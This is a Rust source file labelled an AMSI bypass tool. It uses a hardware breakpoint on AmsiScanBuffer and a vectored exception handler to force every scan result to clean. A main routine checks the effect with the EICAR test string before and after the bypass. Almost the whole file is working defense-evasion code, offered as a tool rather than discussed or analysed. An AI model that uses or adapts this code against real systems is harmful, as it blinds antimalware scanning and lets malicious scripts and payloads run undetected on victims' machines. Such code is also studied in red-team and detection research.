/*
    AMSI Bypass Tool
    Author: @5mukx
*/

#![allow(non_snake_case, non_camel_case_types)]

use std::ffi::CString;
use std::ptr::null_mut;
use thiserror::Error;
use widestring::U16CString;
use winapi::ctypes::c_void;
use winapi::shared::{minwindef::ULONG, ntdef::HRESULT};
use winapi::um::{
    errhandlingapi::AddVectoredExceptionHandler,
    libloaderapi::{GetModuleHandleA, GetProcAddress, LoadLibraryA},
    minwinbase::EXCEPTION_SINGLE_STEP,
    winnt::{CONTEXT, CONTEXT_ALL, EXCEPTION_POINTERS, HANDLE, LONG},
};

use winapi::vc::excpt::{EXCEPTION_CONTINUE_EXECUTION, EXCEPTION_CONTINUE_SEARCH};

// AMSI API bindings
#[link(name = "amsi")]
extern "system" {
    fn AmsiInitialize(app_name: LPCWSTR, amsi_context: *mut HAMSICONTEXT) -> HRESULT;
    fn AmsiUninitialize(amsi_context: HAMSICONTEXT);
    fn AmsiOpenSession(amsi_context: HAMSICONTEXT, amsi_session: *mut HAMSISESSION) -> HRESULT;
    fn AmsiCloseSession(amsi_context: HAMSICONTEXT, amsi_session: HAMSISESSION);
    fn AmsiScanBuffer(
        amsi_context: HAMSICONTEXT,
        buffer: LPCVOID,
        length: ULONG,
        content_name: LPCWSTR,
        session: HAMSISESSION,
        result: *mut AMSI_RESULT,
    ) -> HRESULT;
}

// NT API bindings
extern "stdcall" {
    fn NtGetContextThread(thread_handle: HANDLE, thread_context: *mut CONTEXT) -> ULONG;
    fn NtSetContextThread(thread_handle: HANDLE, thread_context: *mut CONTEXT) -> ULONG;
}

type HAMSICONTEXT = *mut c_void;
type HAMSISESSION = *mut c_void;
type AMSI_RESULT = i32;
type LPCWSTR = *const u16;
type LPCVOID = *const c_void;

const S_OK: i32 = 0;
const AMSI_RESULT_CLEAN: i32 = 0;

// global state
static mut AMSI_SCAN_BUFFER_PTR: Option<*mut u8> = None;

// custom error type with thiserror ! Trying something new =)
#[derive(Error, Debug)]
enum AmsiError {
    #[error("CString creation failed: {0}")]
    CStringError(#[from] std::ffi::NulError),
    #[error("U16CString creation failed: {0}")]
    U16CStringError(#[from] widestring::error::ContainsNul<u16>),
    #[error("Failed to load amsi.dll")]
    LoadLibraryFailed,
    #[error("Failed to get AmsiScanBuffer address")]
    GetProcAddressFailed,
    #[error("Failed to initialize AMSI: HRESULT {0}")]
    AmsiInitFailed(i32),
    #[error("Failed to open AMSI session")]
    AmsiSessionFailed,
    #[error("Failed to add vectored exception handler")]
    ExceptionHandlerFailed,
    #[error("Failed to get thread context: status {0}")]
    GetContextFailed(ULONG),
    #[error("Failed to set thread context: status {0}")]
    SetContextFailed(ULONG),
    #[error("I/O error: {0}")]
    IoError(#[from] std::io::Error),
}

// bit manipulation
fn set_bits(dw: u64, low_bit: i32, bits: i32, new_value: u64) -> u64 {
    let mask = (1 << bits) - 1;
    (dw & !(mask << low_bit)) | (new_value << low_bit)
}

fn clear_breakpoint(ctx: &mut CONTEXT, index: i32) {
    match index {
        0 => ctx.Dr0 = 0,
        1 => ctx.Dr1 = 0,
        2 => ctx.Dr2 = 0,
        3 => ctx.Dr3 = 0,
        _ => {}
    }
    ctx.Dr7 = set_bits(ctx.Dr7, index * 2, 1, 0);
    ctx.Dr6 = 0;
    ctx.EFlags = 0;
}

// enable hardware breakpoint
fn enable_breakpoint(ctx: &mut CONTEXT, address: *mut u8, index: i32) {
    match index {
        0 => ctx.Dr0 = address as u64,
        1 => ctx.Dr1 = address as u64,
        2 => ctx.Dr2 = address as u64,
        3 => ctx.Dr3 = address as u64,
        _ => {}
    }
    ctx.Dr7 = set_bits(ctx.Dr7, 16, 16, 0);
    ctx.Dr7 = set_bits(ctx.Dr7, index * 2, 1, 1);
    ctx.Dr6 = 0;
}

// get argument from context
fn get_arg(ctx: &CONTEXT, index: i32) -> usize {
    match index {
        0 => ctx.Rcx as usize,
        1 => ctx.Rdx as usize,
        2 => ctx.R8 as usize,
        3 => ctx.R9 as usize,
        _ => unsafe { *((ctx.Rsp as *const u64).offset((index + 1) as isize) as *const usize) },
    }
}

fn get_return_address(ctx: &CONTEXT) -> usize {
    unsafe { *(ctx.Rsp as *const usize) }
}

fn set_result(ctx: &mut CONTEXT, result: usize) {
    ctx.Rax = result as u64;
}

fn adjust_stack_pointer(ctx: &mut CONTEXT, amount: i32) {
    ctx.Rsp = (ctx.Rsp as i64 + amount as i64) as u64;
}

fn set_ip(ctx: &mut CONTEXT, new_ip: usize) {
    ctx.Rip = new_ip as u64;
}

unsafe extern "system" fn exception_handler(exceptions: *mut EXCEPTION_POINTERS) -> LONG {
    let exception_record = unsafe { &*(*exceptions).ExceptionRecord };
    let ctx = unsafe { &mut *(*exceptions).ContextRecord };

    if exception_record.ExceptionCode == EXCEPTION_SINGLE_STEP
        && exception_record.ExceptionAddress as *mut u8 == AMSI_SCAN_BUFFER_PTR.unwrap()
    {
        println!(
            "[i] AMSI Bypass invoked at address: {:?}",
            exception_record.ExceptionAddress
        );

        let return_address = get_return_address(ctx);
        let scan_result_ptr = get_arg(ctx, 5) as *mut i32;
        unsafe { *scan_result_ptr = AMSI_RESULT_CLEAN };

        set_ip(ctx, return_address);
        adjust_stack_pointer(ctx, std::mem::size_of::<*mut u8>() as i32);
        set_result(ctx, S_OK as usize);
        clear_breakpoint(ctx, 0);

        EXCEPTION_CONTINUE_EXECUTION
    } else {
        EXCEPTION_CONTINUE_SEARCH
    }
}

struct AmsiContext {
    context: HAMSICONTEXT,
    session: HAMSISESSION,
}

impl AmsiContext {
    fn new(app_name: &str) -> Result<Self, AmsiError> {
        let app_name = U16CString::from_str(app_name).map_err(AmsiError::U16CStringError)?;
        let mut context = null_mut();
        let result = unsafe { AmsiInitialize(app_name.as_ptr(), &mut context) };
        if result != S_OK {
            return Err(AmsiError::AmsiInitFailed(result));
        }

        let mut session = null_mut();
        if unsafe { AmsiOpenSession(context, &mut session) } != S_OK {
            unsafe { AmsiUninitialize(context) };
            return Err(AmsiError::AmsiSessionFailed);
        }

        Ok(AmsiContext { context, session })
    }

    fn scan_buffer(&self, buffer: &str, content_name: &str) -> Result<AMSI_RESULT, AmsiError> {
        let content_name =
            U16CString::from_str(content_name).map_err(AmsiError::U16CStringError)?;
        let mut result = 0;
        unsafe {
            AmsiScanBuffer(
                self.context,
                buffer.as_ptr() as LPCVOID,
                buffer.len() as ULONG,
                content_name.as_ptr(),
                self.session,
                &mut result,
            );
        }
        Ok(result)
    }
}

impl Drop for AmsiContext {
    fn drop(&mut self) {
        unsafe {
            AmsiCloseSession(self.context, self.session);
            AmsiUninitialize(self.context);
        }
    }
}

// setup amsi bypass.
#[allow(static_mut_refs)]
fn setup_amsi_bypass() -> Result<*mut c_void, AmsiError> {
    unsafe {
        if AMSI_SCAN_BUFFER_PTR.is_none() {
            let module_name = CString::new("amsi.dll").map_err(AmsiError::CStringError)?;
            let module_handle = {
                let handle = GetModuleHandleA(module_name.as_ptr());
                if handle.is_null() {
                    LoadLibraryA(module_name.as_ptr())
                } else {
                    handle
                }
            };
            if module_handle.is_null() {
                return Err(AmsiError::LoadLibraryFailed);
            }

            let function_name = CString::new("AmsiScanBuffer").map_err(AmsiError::CStringError)?;
            let amsi_scan_buffer = GetProcAddress(module_handle, function_name.as_ptr());
            if amsi_scan_buffer.is_null() {
                return Err(AmsiError::GetProcAddressFailed);
            }
            AMSI_SCAN_BUFFER_PTR = Some(amsi_scan_buffer as *mut u8);
        }

        let h_ex_handler = AddVectoredExceptionHandler(1, Some(exception_handler));
        if h_ex_handler.is_null() {
            return Err(AmsiError::ExceptionHandlerFailed);
        }

        let mut thread_ctx: CONTEXT = std::mem::zeroed();
        thread_ctx.ContextFlags = CONTEXT_ALL;
        let status = NtGetContextThread(-2isize as HANDLE, &mut thread_ctx);
        if status != 0 {
            return Err(AmsiError::GetContextFailed(status));
        }

        enable_breakpoint(&mut thread_ctx, AMSI_SCAN_BUFFER_PTR.unwrap(), 0);

        let status = NtSetContextThread(-2isize as HANDLE, &mut thread_ctx);
        if status != 0 {
            return Err(AmsiError::SetContextFailed(status));
        }

        Ok(h_ex_handler)
    }
}

// sample test amsi bypass
fn test_amsi_bypass() -> Result<(), AmsiError> {
    let amsi = AmsiContext::new("TestApp")?;
    let test_string = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*";

    let result_before = amsi.scan_buffer(test_string, "TestContent")?;
    println!("[i] Result before bypass: {}", result_before);
    println!(
        "{}",
        if result_before == AMSI_RESULT_CLEAN {
            "[i] AMSI did not detect the string as malicious before bypass. Test might be invalid."
        } else {
            "[i] AMSI detected the string as malicious before bypass."
        }
    );

    setup_amsi_bypass()?;
    println!("[+] AMSI bypass successfully set up.");

    let result_after = amsi.scan_buffer(test_string, "TestContent")?;
    println!("[i] Result after bypass: {}", result_after);
    println!(
        "{}",
        if result_after == AMSI_RESULT_CLEAN {
            "[i] AMSI did not detect the string as malicious after bypass."
        } else {
            "[i] AMSI still detected the string as malicious after bypass. Bypass might not have worked."
        }
    );

    Ok(())
}

// pause function for debugging
fn pause() -> Result<(), AmsiError> {
    println!("[+] Scan the process with PE-SIEVE to check for any hooks in memory.");
    let mut buf = String::new();
    std::io::stdin()
        .read_line(&mut buf)
        .map_err(AmsiError::IoError)?;
    Ok(())
}

fn main() {
    match test_amsi_bypass() {
        Ok(()) => {
            println!("[+] Verification complete.");
            if let Err(e) = pause() {
                println!("Pause failed: {:?}", e);
            }
        }
        Err(e) => println!("Error during verification: {:?}", e),
    }
}
